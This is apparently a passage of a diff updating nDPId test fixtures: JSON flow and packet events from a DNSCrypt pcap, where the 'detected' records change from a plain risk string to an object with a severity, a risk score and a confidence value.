AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAXcbtEgAL0RChgKAAABLUxxH8tlAbsGBOPgZBgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":330,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAABQbtEAub0RLusKAAABLUxxHwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":330,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":331,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAABQbtAAub0RLuwKAAABLUxxHwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
@@ -689,55 +689,55 @@
 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":946739317829,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739317829,"pkt":"ZmZmZmZmRERERERECABFAADSA+lAAC8R6AotTHEfCgAAAQG71+MAvjWuZBaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAr5zEv1WGx7jem2pK2nflqiaMVF6rzF7WHGlvrWl\/ySW6UfM8aTB84zwXL6LFGFBJtiDl\/1MLBjf7\/4+Tj2baBU4DeMBZ\/3\/bX+\/ckKf+At437jBg5+agLK3mfgxAT218TgN4wFn\/f9sAAAABX1NRj19Uow8="}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAIc+3JAAL0RigEKAAABl1DeT9J0AbsCCDh2XDIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAXc+3MgAL0RpkAKAAABl1DeT7G5AbsGBKXWXC8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAXc+3QgAL0Rpj8KAAABl1DeT7pxAbsGBJ0gXC0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":341,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAABQ+3MAub0RyxMKAAABl1DeTwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":341,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":342,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAABQ+3QAub0RyxIKAAABl1DeTwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":342,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
